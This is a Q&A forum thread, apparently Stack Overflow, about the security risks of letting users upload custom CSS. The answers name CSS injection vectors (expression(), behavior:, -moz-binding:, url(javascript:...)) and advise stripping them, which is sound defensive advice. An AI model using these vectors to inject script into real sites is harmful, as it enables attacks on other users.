Reputation: 17663
What things should be taken point if we have to use unknown user css file
I am thinking to let the users upload a css file and control the colour scheme and other things of the site as per their own configuration.
So before building it i would like to know what things i should take care?
Upvotes: 3
Views: 112
Answers (2)
Reputation: 536469
A CSS injection is nearly as good as script injection. You've got expression() in IE6-7 (and later in compatibility view), you've got behavior: (HTC) in IE, you've got -moz-binding: in Firefox, you've got content: to inject text, and occasionally, mostly in older browsers that don't block it, you've got url(javascript:...). Even without these you've got a fair amount of risk just from visual UI spoofing.
As long as a user stylesheet is limited to the user that made it, a user can only compromise themselves. The problem comes when users start sharing stylesheets. You might perhaps disallow users from picking the same external stylesheet address as another user to discourage this.
Upvotes: 4
Reputation: 92772
Security: The so-called "CSS Expressions" allow JavaScript code in CSS. Although they are now deprecated, they still work in IE5-7, and in IE's compatibility modes.
I recommend stripping out any expression() rule from the stylesheet. It serves no real purpose, doesn't work in normal browsers and in IE it introduces executable code to CSS.
Upvotes: 2
Related Questions
- Is CSS (and derivates SASS, SCSS, ...) is it safe to allow user upload? Is there a security issue?
- How to edit css files using php safely?
- security issues with user-supplied CSS?
- dynamic css per user
- Allowing user css
- User Uploaded CSS safe?
- Is there a security threat if I enable a user to add CSS?
- A client wants me to do CSS coding (only) but doesn't want to provide me the php files
- PHP: Safe to allow users to write custom CSS to customize a webpage on my site?
- dangers to user css